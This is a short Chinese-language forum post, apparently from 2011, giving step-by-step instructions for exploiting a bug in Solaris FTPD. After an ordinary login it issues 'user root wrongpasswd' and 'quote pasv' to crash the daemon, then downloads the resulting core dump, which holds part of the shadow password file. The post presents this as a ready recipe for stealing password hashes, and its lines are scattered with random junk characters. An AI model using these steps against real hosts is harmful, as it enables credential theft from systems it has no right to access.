该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:8 d/ f$ r4 f: g1 C) R) w
B1 h; b) U+ i$ \9 q$ `
1.通过 ftp 正常登录到目的主机上+ w9 o; h/ ~5 Y* y# Y/ o; M3 d0 R4 u
& v# u% d% ]* I" D6 v
2.输入如下命令序列:: D+ L9 ]* [, x. m9 T; i* @5 @0 O
; z9 c! [6 |- m# gftp> user root wrongpasswd
8 J; r% ?5 ~% }. s- z+ `1 f0 b B
( ^* J3 L% {) N1 ?3 q# Kftp> quote pasv
, |! I" c& i) d1 y$ T( y1 @3 X0 W7 Y& C) f% K( B1 r% E1 _# H
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
, Y8 p2 l2 L- r2 H# b) ^4 O2 q. l( T/ H' H
4.再次进入FTP >get core' V& e) w E, X9 r6 K6 e6 f
# L7 E7 c; ^/ x. t3 ?# w8 q
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
" v5 C: Y) O' A) d
9 ~% d& C0 h7 Q2 M |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡